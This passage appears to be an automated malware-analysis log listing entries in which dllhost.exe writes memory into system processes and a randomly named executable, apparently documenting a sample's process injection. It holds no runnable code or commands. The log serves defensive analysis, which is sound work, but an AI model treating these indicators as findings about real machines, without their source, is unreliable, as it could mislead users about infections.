Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCCA00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
